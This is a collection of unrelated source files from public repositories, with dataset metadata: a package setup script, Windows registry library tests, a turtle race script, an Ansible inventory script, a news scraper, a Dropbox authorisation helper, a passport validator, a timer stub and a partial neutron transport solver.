BodenmillerGroup/bbwidgets | 10,350,871,230,746 | 8b69a7ee222912fd63659ebb1ecfd930a117d96a | 684b46b1e1d6a9e4c6fb579eeba548a653f55484 | /setup.py | db9f8581cb9d2a981327642817205c2d7c859cde | ["MIT"] | permissive | https://github.com/BodenmillerGroup/bbwidgets | de092ef528a828255a7d6f357a0b1560a4b5d249 | 9ce5867b19868baae16b5690a4c3d1c7b9267b74 | refs/heads/master | 2020-05-29T21:46:11.928149 | 2019-06-03T11:24:11 | 2019-06-03T11:24:11 | 189,392,083 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from setuptools import setup
with open('README.md', 'r') as f:
long_description = f.read()
setup(
name='bbwidgets',
version='0.1.1',
packages=['bbwidgets'],
url='https://github.com/BodenmillerGroup/bbwidgets',
license='MIT',
author='Jonas Windhager',
author_email='jonas.windhager@uzh.ch',
description='Interactive Widgets for the Jupyter Notebook',
long_description=long_description,
long_description_content_type='text/markdown',
install_requires=['ipywidgets', 'matplotlib', 'numpy', 'traitlets', 'traittypes'],
classifiers=[
'Framework :: Jupyter',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
]
)
| UTF-8 | Python | false | false | 770 | py | 4 | setup.py | 3 | 0.650649 | 0.645455 | 0 | 25 | 29.8 | 86 |
Infinidat/infi.registry | 1,949,915,166,276 | 3b5dc1e4e8fa3e0fb33aff0ad1ee275c17a49a41 | 1e29869aca0233c33a99321c48cafa50c34c0a07 | /src/infi/registry/interface/tests.py | 6370bba9810d190026deee02431128495661fe50 | [
"BSD-3-Clause"
]
| permissive | https://github.com/Infinidat/infi.registry | 00d3d09073c6106faee63b932b1e40df22d907f4 | 9ad1a17625c30c37c0f32641e0e8f837446f9d77 | refs/heads/master | 2023-05-27T02:25:23.125253 | 2019-02-18T11:23:14 | 2019-02-18T11:23:14 | 4,346,622 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
import logging
import unittest
import mock
import os
from .. import interface, constants, dtypes, errors, funcs, c_api
from ..dtypes import LPWSTR, LPCWSTR
class BaseTestCase(unittest.TestCase):
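    """
    Base class for the interface tests: each concrete subclass is named after
    the registry API function it exercises, and _get_tested_function /
    _get_tested_api_function resolve that function from the class name.
    """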
def _get_tested_function(self):
return getattr(interface, self.__class__.__name__, None)
def _get_tested_api_function(self):
return getattr(c_api, self.__class__.__name__, None) or \
getattr(c_api, '%sW' % self.__class__.__name__) or \
False
def setUp(self):
if os.name != 'nt':
raise unittest.SkipTest
if not self._get_tested_api_function().is_available_on_this_platform():
raise unittest.SkipTest
def tearDown(self):
pass
def _assert_func_raises(self, exception, kwargs):
self.assertRaises(exception, self._get_tested_function(), **kwargs)
def _test_base_exception(self, kwargs, expected_exception):
api_function = self._get_tested_api_function()
@mock.patch("infi.registry.c_api.%s" % api_function.__name__)
def _test(mocked_api_function):
mocked_api_function.side_effect = WindowsError(-1)
self._assert_func_raises(expected_exception, kwargs)
_test()
class RegCloseKey(BaseTestCase):
def test_invalid_key_1(self):
kwargs = {'key': 0}
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_invalid_key_2(self):
kwargs = {'key': 4000}
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_valid_close(self):
open_key = self._get_open_key()
self.assertEqual(None, interface.RegCloseKey(open_key))
def _get_open_key(self):
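        # NOTE (added): the raise below short-circuits this helper, so the
        # tests that depend on it are skipped; the lines after it never run.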
raise unittest.SkipTest
HKLM = interface.RegConnectRegistry(None, constants.HKEY_LOCAL_MACHINE)
return interface.RegCreateKeyEx(HKLM, 'SOFTWARE')
def test_double_close(self):
open_key = self._get_open_key()
self.assertEqual(None, interface.RegCloseKey(open_key))
self.assertEqual(None, interface.RegCloseKey(open_key))
def test_base_exception(self):
kwargs = {'key':-1}
self._test_base_exception(kwargs, errors.CloseKeyFailed)
class RegConnectRegistry(BaseTestCase):
def test_invalid_local_key(self):
kwargs = {'machineName': None,
'key': 0}
self._assert_func_raises(ValueError, kwargs)
def test_invalid_remote_key(self):
kwargs = {'machineName': 'remoteComputer',
'key': constants.HKEY_CURRENT_USER}
self._assert_func_raises(ValueError, kwargs)
@mock.patch("infi.registry.c_api.RegConnectRegistryW")
def test_valid_remote_keys(self, mocked_function):
mocked_function.return_value = None
kwargs = {'machineName': 'remoteComputer'}
for key in [constants.HKEY_LOCAL_MACHINE, constants.HKEY_USERS]:
kwargs['key'] = key
self.assertEqual(None, interface.RegConnectRegistry(**kwargs))
self.assertEqual(2, mocked_function.call_count)
@mock.patch("infi.registry.c_api.RegConnectRegistryW")
def test_valid_local_keys(self, mocked_function):
mocked_function.return_value = None
kwargs = {'machineName': None}
for key in [constants.HKEY_LOCAL_MACHINE, constants.HKEY_USERS, constants.HKEY_CURRENT_CONFIG,
constants.HKEY_CURRENT_USER, constants.HKEY_CLASSES_ROOT]:
kwargs['key'] = key
self.assertEqual(None, interface.RegConnectRegistry(**kwargs))
self.assertEqual(5, mocked_function.call_count)
def test_connect_to_local_machine(self):
key = interface.RegConnectRegistry(None, constants.HKEY_LOCAL_MACHINE)
self.assertGreater(key, 0)
def test_connect_to_remote_machine(self):
import socket
key = interface.RegConnectRegistry(r'\\%s' % socket.gethostname(), constants.HKEY_LOCAL_MACHINE)
self.assertGreater(key, 0)
def test_connect_to_invalid_remote(self):
kwargs = {'machineName': r'\\0.0.0.0',
'key': constants.HKEY_LOCAL_MACHINE}
self._assert_func_raises(errors.RemoteRegistryConnectionFailed, kwargs)
def test_base_exception(self):
kwargs = {'machineName':None, 'key':constants.HKEY_LOCAL_MACHINE}
self._test_base_exception(kwargs, errors.ConnectRegistryFailed)
class TestCaseLocalMachine(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.key = interface.RegConnectRegistry(None, constants.HKEY_LOCAL_MACHINE)
def tearDown(self):
interface.RegCloseKey(self.key)
BaseTestCase.tearDown(self)
class RegFlushKey(BaseTestCase):
def test_flush_key(self):
self.key = interface.RegConnectRegistry(None, constants.HKEY_LOCAL_MACHINE)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
interface.RegFlushKey(self.key)
interface.RegCloseKey(self.key)
def test_base_exception(self):
kwargs = {'key':-1}
self._test_base_exception(kwargs, errors.FlushKeyError)
class RegCreateKeyEx(TestCaseLocalMachine):
def test_create_existing_subkey(self):
self.assertGreater(interface.RegCreateKeyEx(self.key, 'SOFTWARE'), 0)
def test_access_denied(self):
# TODO Implement test_access_denied
raise unittest.SkipTest
def test_closed_key(self):
self.tearDown()
kwargs = {'key': self.key,
'subKey': 'SOFTWARE'}
self._assert_func_raises(errors.InvalidHandleException, kwargs)
self.setUp()
def test_unicode_subkey_1(self):
self.assertGreater(interface.RegCreateKeyEx(self.key, u'SOFTWARE'), 0)
def test_deep_subkey(self):
self.assertGreater(interface.RegCreateKeyEx(self.key, r'SOFTWARE\Microsoft'), 0)
def test_unicode_subkey_2(self):
self.assertGreater(interface.RegCreateKeyEx(self.key, u'SOFTWARE\\\xe2\x9f\xb2'), 0)
def test_base_exception(self):
kwargs = {'key':-1, 'subKey':'Foo'}
self._test_base_exception(kwargs, errors.CreateKeyFailed)
class RegDeleteKey(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
def tearDown(self):
TestCaseLocalMachine.tearDown(self)
def test_delete_nonexisting_subkey(self):
kwargs = {'key': self.key,
'subKey': 'DoesNotExist'}
self._assert_func_raises(KeyError, kwargs)
def test_delete_with_closed_key(self):
kwargs = {'key': self.key,
'subKey': 'DoesNotExist'}
self.tearDown()
self._assert_func_raises(errors.InvalidHandleException, kwargs)
self.setUp()
def test_delete_existing_subkey(self):
key = interface.RegCreateKeyEx(self.key, 'TestDeleteExistingSubkey')
interface.RegCloseKey(key)
kwargs = {'key': self.key,
'subKey': 'TestDeleteExistingSubkey'}
self.assertEqual(None, interface.RegDeleteKey(**kwargs))
def test_delete_None_as_subkey(self):
kwargs = {'key': self.key,
'subKey': None}
self.tearDown()
self._assert_func_raises(errors.InvalidParameterException, kwargs)
self.setUp()
def test_delete_subkey_with_subkeys(self):
key = interface.RegCreateKeyEx(self.key, 'TestDeleteSubkeyWithSubkeys')
interface.RegCloseKey(interface.RegCreateKeyEx(key, 'TestDeleteSubkeyWithSubkeys'))
interface.RegCloseKey(key)
kwargs = {'key': self.key,
'subKey': 'TestDeleteSubkeyWithSubkeys'}
self._assert_func_raises(errors.AccessDeniedException, kwargs)
def test_delete_subkey_with_values(self):
key = interface.RegCreateKeyEx(self.key, u'TestDeleteSubKeyWithValues')
interface.RegSetValueEx(key, 'someValue', 'fooBar')
interface.RegCloseKey(key)
kwargs = {'key': self.key,
'subKey': 'TestDeleteSubKeyWithValues'}
self.assertEqual(None, interface.RegDeleteKey(**kwargs))
def test_delete_existing_subkey_in_unicode(self):
key = interface.RegCreateKeyEx(self.key, u'\xe2\x9f\xb2')
interface.RegCloseKey(key)
kwargs = {'key': self.key,
'subKey': u'\xe2\x9f\xb2'}
self.assertEqual(None, interface.RegDeleteKey(**kwargs))
def test_base_exception(self):
kwargs = {'key':-1, 'subKey': u'fooBar'}
self._test_base_exception(kwargs, errors.DeleteKeyFailed)
class RegDeleteValue(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
self.key = interface.RegCreateKeyEx(self.key , 'RegDeleteValue')
def test_invalid_key(self):
kwargs = {'key': 0, }
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_invalid_value_name(self):
kwargs = {'key': self.key,
'valueName': 'DoesNotExist'}
self._assert_func_raises(KeyError, kwargs)
def test_valid_value_name(self):
raise unittest.SkipTest
def test_access_denied(self):
raise unittest.SkipTest
def test_null_value_name(self):
kwargs = {'key': self.key,
'valueName': None}
self._assert_func_raises(KeyError, kwargs)
def test_base_exception(self):
kwargs = {'key':-1, 'valueName':'m0she'}
self._test_base_exception(kwargs, errors.DeleteValueFailed)
class RegEnumKeyEx(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
def test_index_0(self):
result = interface.RegEnumKeyEx(self.key, 0)
self.assertNotEqual(None, result)
self.assertGreater(len(result), 0)
def test_index_valid_range(self):
for index in range(0, 4):
result = interface.RegEnumKeyEx(self.key, index)
self.assertNotEqual(None, result)
self.assertGreater(len(result), 0)
def test_index_outbound_index(self):
kwargs = {'key': self.key,
'index': 100}
self._assert_func_raises(IndexError, kwargs)
def test_index_bad_index(self):
kwargs = {'key': self.key,
'index':-1}
self._assert_func_raises(IndexError, kwargs)
def test_base_exception(self):
kwargs = {'key':-1, 'index':-1}
self._test_base_exception(kwargs, errors.RegistryBaseException)
class RegEnumValue(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
def test_index_0(self):
name, data = interface.RegEnumValue(self.key, 0)
self.assertNotEqual(None, data, "'%s' value None, it shouldn't be" % name)
def test_index_1(self):
name, data = interface.RegEnumValue(self.key, 1)
self.assertNotEqual(None, data)
def test_index_outbound_index(self):
kwargs = {'key': self.key,
'index': 1024}
self._assert_func_raises(IndexError, kwargs)
def test_index_bad_index(self):
kwargs = {'key': self.key,
'index':-1}
self._assert_func_raises(IndexError, kwargs)
def _test_for_specific_value(self, expected_name, expected_data, key=None):
index = 0
while True:
name, data = interface.RegEnumValue(key or self.key, index)
if name == expected_name:
self.assertTrue(data, expected_data)
return
index += 1
if key:
interface.RegCloseKey(key)
self.assertTrue(False)
def test_system_root(self):
# TODO add tests that cover more value types
self._test_for_specific_value("SystemRoot", r'C:\WINDOWS')
def test_base_exception(self):
kwargs = {'key':-1, 'index':-1}
self._test_base_exception(kwargs, errors.RegistryBaseException)
class RegQueryValueEx(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, r'SYSTEM\CurrentControlSet\Services\Netlogon')
def test_invalid_key(self):
kwargs = {'key': 0, }
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_invalid_value(self):
kwargs = {'key': self.key,
'valueName': 'DoesNotExist'}
self._assert_func_raises(KeyError, kwargs)
def test_access_denied(self):
raise unittest.SkipTest
def test_null_value_name(self):
        # TODO add more tests covering more value types
kwargs = {'key': self.key,
'valueName': None}
self._assert_func_raises(KeyError, kwargs)
def test_string(self):
kwargs = {'key': self.key,
'valueName': 'ObjectName'}
self.assertEqual('LocalSystem', interface.RegQueryValueEx(**kwargs).to_python_object())
def test_dword(self):
kwargs = {'key': self.key,
'valueName': 'start'}
self.assertEqual(3, interface.RegQueryValueEx(**kwargs).to_python_object())
    def test_expand_sz(self):
        kwargs = {'key': self.key,
                  'valueName': 'ImagePath'}
        self.assertEqual(u'%SystemRoot%\\system32\\lsass.exe'.lower(),
                         interface.RegQueryValueEx(**kwargs).to_python_object().lower())
def test_base_exception(self):
kwargs = {'key':-1, 'valueName':'m0she'}
self._test_base_exception(kwargs, errors.RegistryBaseException)
class RegOpenKeyEx(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
def test_invalid_key(self):
kwargs = {'key': 0,
'subKey': None }
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_invalid_subkey(self):
kwargs = {'key': self.key,
'subKey': 'DoesNotExist'}
self._assert_func_raises(KeyError, kwargs)
def test_none_as_subkey(self):
kwargs = {'key': self.key,
'subKey': None}
self.assertGreater(interface.RegOpenKeyEx(**kwargs), 0)
def test_valid_key(self):
kwargs = {'key': self.key,
'subKey': 'Terminal Server'}
self.assertGreater(interface.RegOpenKeyEx(**kwargs), 0)
def test_base_exception(self):
kwargs = {'key':-1, 'subKey':'m0she'}
self._test_base_exception(kwargs, errors.OpenKeyFailed)
class RegQueryInfoKey(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
def test_invalid_key(self):
kwargs = {'key': 0 }
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_valid_key(self):
result = interface.RegQueryInfoKey(self.key)
self.assertGreater(result[0], 0)
def test_base_exception(self):
kwargs = {'key':-1}
self._test_base_exception(kwargs, errors.QueryInfoKeyFailed)
class RegSetValueEx(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
self.key = interface.RegCreateKeyEx(self.key , 'RegSetValueEx')
def _test_set_get_value(self, name, data):
kwargs = {'key': self.key,
'valueName': name,
'valueData': data}
self.assertEqual(None, interface.RegSetValueEx(**kwargs))
self.assertEqual(data, interface.RegQueryValueEx(key=self.key, valueName=name).to_python_object())
def test_null_value(self):
kwargs = {'key': self.key,
'valueName': '',
'valueData': 'hi'}
self.assertEqual(None, interface.RegSetValueEx(**kwargs))
def test_dword_small(self):
self._test_set_get_value('dword', 1)
def test_dword_max(self):
self._test_set_get_value('dword_max', 2 ** 32 - 1)
def test_sz(self):
self._test_set_get_value('sz', u'hi')
def test_multi_sz(self):
self._test_set_get_value('multi_sz', [u'hi', u'bye'])
def test_binary(self):
self._test_set_get_value('binary', (5, 5, 5, 5, 5, 5, 5, 5))
def test_base_exception(self):
kwargs = {'key':-1, 'valueName':'m0she', 'valueData':1}
self._test_base_exception(kwargs, errors.RegistryBaseException)
| UTF-8 | Python | false | false | 16,763 | py | 13 | tests.py | 12 | 0.633598 | 0.627871 | 0.000537 | 452 | 36.081858 | 106 |
tdemsoy/phytn | 9,921,374,494,209 | 5a153def1fe71b3b58a6c55415d3a4b2d1c76b0a | 0e40118260fd7f4806390aafa8ced03527a54e01 | /phytnkopek | e28ad5f62ea72578b10026b3a4ae8510b53953e0 | []
| no_license | https://github.com/tdemsoy/phytn | 50175f3b3f274136df6e02c3c69dbdb7d4c23e8a | d3539d00bd7b63bcb541f8aed0e5ccd4c659f88e | refs/heads/master | 2021-09-27T17:06:03.794565 | 2018-11-09T20:24:55 | 2018-11-09T20:24:55 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/bin/python3
from turtle import *
from random import randint
penup()
ivy = Turtle()
ivy.shape('turtle')
ivy.color('green')
ivy.penup()
ivy.goto(-160, 40)
ivy.pendown()
jim = Turtle()
jim.shape('turtle')
jim.color('orange')
jim.penup()
jim.goto(-160, 10)
jim.pendown()
for turn in range(100):
    ivy.forward(randint(1, 5))
    jim.forward(randint(1, 5))
# keep the window open until the user closes it
done()
| UTF-8 | Python | false | false | 364 | 1 | phytnkopek | 1 | 0.664835 | 0.615385 | 0 | 30 | 11.033333 | 27 |
|
bersace/dotfiles | 3,650,722,221,365 | a71d20cf3231bc6a17c42f0321927e162aa51b32 | f3ac506b164a8aa979785b0efdb4bf8021d3c426 | /bin/inventory | 0324b97d2bde829d11ba52c7ba119107fe4012ea | []
| no_license | https://github.com/bersace/dotfiles | 1d5f419c8e7aaddf905c1c891ec842a8748258f1 | 019ceb838a2d8114a90810403c4929e17842c4ed | refs/heads/master | 2016-09-26T01:39:04.960608 | 2016-09-08T09:05:05 | 2016-09-10T20:56:51 | 41,423,518 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
import base64
import os
import json
import socket
import subprocess
TARGET = os.environ.get('TARGET', 'localhost')
CONNECTION = os.environ.get('CONNECTION', 'local')
SHCMD = os.environ.get('SHCMD', '')
if 'localhost' == TARGET:
TARGET = socket.gethostname()
inventory = {
'all': {
'hosts': [TARGET],
},
'_meta': {
'hostvars': {
TARGET: {
'ansible_connection': CONNECTION,
},
},
},
}
print json.dumps(inventory, indent=4)
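# Example invocation (added; the host name is illustrative) -- use this script
# as an ansible dynamic inventory and steer it via the environment:
#   TARGET=somehost CONNECTION=ssh ansible all -i ./inventory -m ping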
| UTF-8 | Python | false | false | 535 | 33 | inventory | 5 | 0.566355 | 0.560748 | 0 | 32 | 15.71875 | 50 |
|
timostrating/ponypicpy | 188,978,565,591 | ae68b2e0e10ce7badc806f6868cd7f990b222616 | 7163271868c14e7fc2fde82b6958a6c2c53ecbbe | /scrapers/nieuws/spiders/meppelercourant.py | bd1320342345fca48f2213993dfc1d185696dcf7 | []
| no_license | https://github.com/timostrating/ponypicpy | 32ea8677d5c741a0d34e8e05b67ef3e8ba5dd8a2 | 14e4427ae3e1bc047f7b747b07eb65201643892d | refs/heads/master | 2020-03-18T11:50:20.706974 | 2018-07-02T14:20:58 | 2018-07-02T14:20:58 | 134,693,941 | 1 | 0 | null | false | 2018-06-27T16:11:32 | 2018-05-24T09:38:10 | 2018-06-27T14:45:39 | 2018-06-27T16:11:32 | 742 | 2 | 0 | 0 | CSS | false | null | import scrapy
from datetime import timedelta, date
import urllib2
class MeppelercourantSpider(scrapy.Spider):
name = "meppelercourant"
start_urls = []
def daterange(self, start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)
def __init__(self):
for i in range(1, 13):
self.start_urls.append('https://www.meppelercourant.nl/zoeken/resultaat?p={0}'.format(i))
def parse(self, response):
for article in response.css('.comp-zoeken-sublist-container > div'):
url = "https://www.meppelercourant.nl" + article.css('a').xpath('@href').extract_first()
yield scrapy.Request(url, callback=self.parse_article)
def parse_article(self, response):
yield {
'naam': 'meppelercourant.nl',
'url': response.url,
            'datum': " ".join(filter(None, response.css('.comp-nieuws-detail-credits ::text').extract_first().split(" "))[3:6]).replace(",", " "),
'titel': response.css('h1 ::text').extract_first(),
'tekst': (''.join(response.css(".comp-nieuws-detail-text > p ::text").extract())).replace("\t", "").replace("\n", "").replace("\r", "")
}
def make_requests_from_url(self, url):
request = super(MeppelercourantSpider, self).make_requests_from_url(url)
        request.cookies['PHPSESSID'] = "56cagigi64jq2afkbk8rcjpki4" # You probably need to change this value; just copy it from your own cookie
return request | UTF-8 | Python | false | false | 1,556 | py | 89 | meppelercourant.py | 60 | 0.613753 | 0.604113 | 0 | 34 | 44.794118 | 152 |
mrbirl/PiCloud | 4,844,723,155,834 | 269a82e06c48ba131b06bb1e8c34d3cba1e0a5b3 | e8bb08b43628242669dbf97a738b2c54e0ff7063 | /Server App/auth.py | a76df03187b1eac6dce74389ca8a5b264fa16e78 | [
"LicenseRef-scancode-warranty-disclaimer"
]
| no_license | https://github.com/mrbirl/PiCloud | 16e6b422142dd15ee78542b37bae94cd187a8817 | 98a4ab5abaff63d10ec51253af007d910f058329 | refs/heads/master | 2020-12-31T07:32:16.002906 | 2016-04-15T16:24:38 | 2016-04-15T16:24:38 | 56,333,945 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from dropbox import client, session
import webbrowser
# Authorise Dropbox - creates & returns Dropbox client object
def getClient():
APP_KEY = 'theappkey'
APP_SECRET = 'thesecret'
ACCESS_TYPE = 'dropbox'
try:
# See if there is a text file with the tokens already
TOKENS = 'dropbox_token.txt'
token_file = open(TOKENS)
token_key, token_secret = token_file.read().split('|')
token_file.close()
sess = session.DropboxSession(APP_KEY, APP_SECRET, ACCESS_TYPE)
sess.set_token(token_key, token_secret)
except Exception:
# Haven't authorised app already, so:
# Creates a session
sess = session.DropboxSession(APP_KEY, APP_SECRET, ACCESS_TYPE)
# requests a token using the session
request_token = sess.obtain_request_token()
        # builds an authorisation URL using our session
url = sess.build_authorize_url(request_token)
# opens it in the browser
webbrowser.open_new_tab(url)
# when we're authorized, request a key-input
print "Please authorize in the browser. After you're done, press enter."
raw_input()
# If we can obtain the access token, we're authenticated.
access_token = sess.obtain_access_token(request_token)
# Write these to a file for future reference...
token_file = open(TOKENS, 'w')
token_file.write("%s|%s" % (access_token.key, access_token.secret))
token_file.close()
    # Initializes the client so that we can make API calls
    # a new name here matters: reusing "client" would shadow the imported
    # module and raise UnboundLocalError
    dropbox_client = client.DropboxClient(sess)
    return dropbox_client
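# Minimal usage sketch (added; the APP_KEY/APP_SECRET placeholders above must
# be replaced with real Dropbox app credentials before this can work):
# if __name__ == '__main__':
#     dbx = getClient()
#     print dbx.account_info()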
| UTF-8 | Python | false | false | 1,659 | py | 22 | auth.py | 21 | 0.629898 | 0.629898 | 0 | 43 | 36.581395 | 80 |
Tarnal12/AoC2020 | 15,487,652,073,622 | 1935b374c3f4482390b91aa80e1fddd3507f4410 | 083c008397f7ba3f67168da8d366e0683a98dda9 | /Day4Soln.py | 9bfddeb21a738a8fb6369167c9d75f30c16a675a | []
| no_license | https://github.com/Tarnal12/AoC2020 | 205544c00531dc87da4db4daf133e6177fa33e9d | 2d6c10df2d8e0c8fd8eff11d990d01e64f5b6653 | refs/heads/master | 2023-02-05T01:32:23.026898 | 2020-12-16T11:25:45 | 2020-12-16T11:25:45 | 318,761,591 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import re
class Passport():
def __init__(self, data: str):
data = data.replace('\n', ' ')
self.data_map = {}
for data_item in data.split(' '):
(data_key, data_value) = data_item.split(':')
self.data_map[data_key] = data_value
#print(f"{data} is valid? {self.is_valid()}")
def is_valid(self):
try:
if int(self.data_map['byr']) < 1920 or int(self.data_map['byr']) > 2002:
return False
if int(self.data_map['iyr']) < 2010 or int(self.data_map['iyr']) > 2020:
return False
if int(self.data_map['eyr']) < 2020 or int(self.data_map['eyr']) > 2030:
return False
height_units = self.data_map['hgt'][-2:]
height_val = int(self.data_map['hgt'][:-2])
if (
height_units not in ('cm', 'in') or
(height_units == 'cm' and (height_val < 150 or height_val > 193)) or
(height_units == 'in' and (height_val < 59 or height_val > 76))
):
return False
            hair_color_re = re.compile("^#[0-9a-f]{6}$")
if not hair_color_re.match(self.data_map['hcl']):
return False
if self.data_map['ecl'] not in ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']:
return False
if len(self.data_map['pid']) != 9 or not self.data_map['pid'].isnumeric():
return False
return (
'byr' in self.data_map and
'iyr' in self.data_map and
'eyr' in self.data_map and
'hgt' in self.data_map and
'hcl' in self.data_map and
'ecl' in self.data_map and
'pid' in self.data_map
)
except Exception as e:
return False
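# Note (added): every required field is accessed inside the try block before
# the final membership check runs, so a missing key raises KeyError and the
# except clause turns it into False; the optional 'cid' field is simply ignored.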
if __name__ == "__main__":
with open("Day4Input.txt", "r") as f:
contents = f.read()
documents = [block for block in contents.split('\n\n')]
valid_count = 0
for document in documents:
passport = Passport(document)
valid_count += passport.is_valid()
print(valid_count)
| UTF-8 | Python | false | false | 2,277 | py | 15 | Day4Soln.py | 15 | 0.475187 | 0.452789 | 0 | 67 | 32.985075 | 93 |
Gastd/motion_ctrl | 15,092,515,085,070 | 0926b1b89d4c64a02a35a980d13ba3a523c2ea35 | 6b20c1fb1b9cbc117f4de21e8a24259d1031100e | /scripts/timer.py | f45e325bbaf11a1b7bcde7199c8649c97f9e2d3a | []
| no_license | https://github.com/Gastd/motion_ctrl | 4e943fe35df0b4551712211d3d0130e611975e22 | 646e4ae933dcc3f658010753aa74f4f00767452f | refs/heads/main | 2023-07-11T08:04:24.722041 | 2021-08-05T02:12:42 | 2021-08-05T02:12:42 | 301,256,131 | 1 | 1 | null | false | 2020-10-08T19:07:24 | 2020-10-05T00:31:23 | 2020-10-05T08:28:34 | 2020-10-08T19:07:23 | 166 | 1 | 1 | 0 | CMake | false | false | from abc import abstractmethod
class Timer(ABC):
def __init__(self):
pass
@abstractmethod
def now(self):
pass
class PseudoTimer(Timer):
def now(self):
return 0.0
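# Minimal usage sketch (added): PseudoTimer satisfies the Timer interface with
# a clock frozen at 0.0, which keeps time-dependent tests deterministic:
#   t = PseudoTimer()
#   assert t.now() == 0.0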
| UTF-8 | Python | false | false | 200 | py | 27 | timer.py | 7 | 0.595 | 0.585 | 0 | 13 | 14.384615 | 30 |
ncrnkovich/NeutronTransport | 7,361,573,968,545 | ab2a1e377874bc3b8182c4c3ac1f6afdefffe0ea | 267a5422bf5039c18264fea9a9708902c42257e8 | /motion1Dfunction.py | 06c3e22a398679277986d345a50da7e765bd6a6a | []
| no_license | https://github.com/ncrnkovich/NeutronTransport | 39d29866e1e58f575cb724ef1c1b9a3a0a1a35ce | 8ec3bcd34d758ccd148bd39f5148a5870027b07d | refs/heads/main | 2023-06-20T03:22:32.770185 | 2021-07-19T14:50:32 | 2021-07-19T14:50:32 | 371,237,396 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #%%
# nonuniform sweep function
# import libraries
import numpy as np
import matplotlib.pyplot as plt
import scipy.special
# import crossSections
# from crossSections import reedsProblem  # unused in this script
# from sweepFunctionNonUniform import sweepMotion
def motion1D(a, I, N, Q_f, q):
x = np.linspace(0,a,I)
dx = x[1] - x[0]
u = materialVel(I,dx, a)
# preallocate angular flux vectors and scalar flux and set boundary conditions
psiCenter = np.zeros((N,I))
psiEdge = np.zeros((N,I+1))
phiPrev = np.zeros(I)
psiEdgePrev = np.zeros((N,I+1))
psiCenterPrev = np.zeros((N,I))
# fill cross section and source vectors
sig_t, sig_s, sig_f, S = fill(I,dx)
mu, w = scipy.special.roots_legendre(N)
# w = w/np.sum(w)
boundary = np.zeros(N)
Q = np.zeros(I) + 0.5*sig_s*phiPrev[0] + Q_f
error = 10
errTol = 1E-8
it = 1
while error > errTol:
psiCenter, psiEdge = sweepMotion(psiCenter, psiEdge, psiCenterPrev, psiEdgePrev, u, q, a, sig_t, Q, boundary)
phi = phiSolver(psiCenter, w)
Q = 0.5*sig_s*phi + Q_f # iterate on source
error = np.linalg.norm(phiPrev - phi)
# copy values for next iteration
phiPrev = phi.copy()
# print("Iteration = ", it, "error = ", error)
it += 1
if error > 100000:
break
# elif it > 1:
# break
return phi, psiCenter
def sweepMotion(psiCenter, psiEdge, psiCenterPrev, psiEdgePrev, u, q, a, sig_t, Q, boundary):
## a = total thickness
## I = number of points
## N = number of discrete ordinates
## sig_t = total cross section vector
## sig_s = scattering cross section vector
## S = source
## psiEdgeL == left boundary condition
## psiEdgeR == right boundary condition
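    ## (Added note) Each cell is closed with the diamond-difference relation
    ##     psiEdge[i+1] = 2*psiCenter[i] - psiEdge[i]
    ## and the material motion enters through the effective direction mu + u/q,
    ## whose sign picks the sweep direction cell by cell.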
# set up grid
N, I = psiCenter.shape
x = np.linspace(0, a, I)
delta = x[1] - x[0]
# P_N Quadrature for order N w_n normalized to 1
mu_n, w_n = scipy.special.roots_legendre(N)
w_n = w_n/np.sum(w_n)
for n in range(mu_n.size):
mu = mu_n[n]
# q = np.abs(mu*v - u) # uniform neutron vel relative to uniform material vel
if mu + u[0]/q[0] > 0:
i = 0
psiEdge[n,0] = boundary[n]
psiEdge[n,-1] = boundary[(N-1)-n]
while i < I:
if mu + u[i+1]/q[i+1] > 0:
psiCenter[n,i] = (delta*Q[i] + psiEdge[n,i]*(2*mu + u[i+1]/q[i+1] + u[i]/q[i]))/(2*mu + delta*sig_t[i] + 2*u[i+1]/q[i+1])
psiEdge[n,i+1] = 2.0*psiCenter[n,i] - psiEdge[n,i]
i += 1
elif mu + u[i+1]/q[i+1] < 0: # change in direction has occurred
j = i
while mu + u[j+1]/q[j+1] < 0: # when false, j is center of B-type cell (no in-flux)
j += 1
                        if j == I - 1:
break
if j == I - 1:
psiCenter[n,j] = (delta*Q[j] - psiEdge[n,j+1]*(2*mu + u[j+1]/q[j+1] + u[j]/q[j]))/(-2*mu + delta*sig_t[j] - 2*u[j]/q[j])
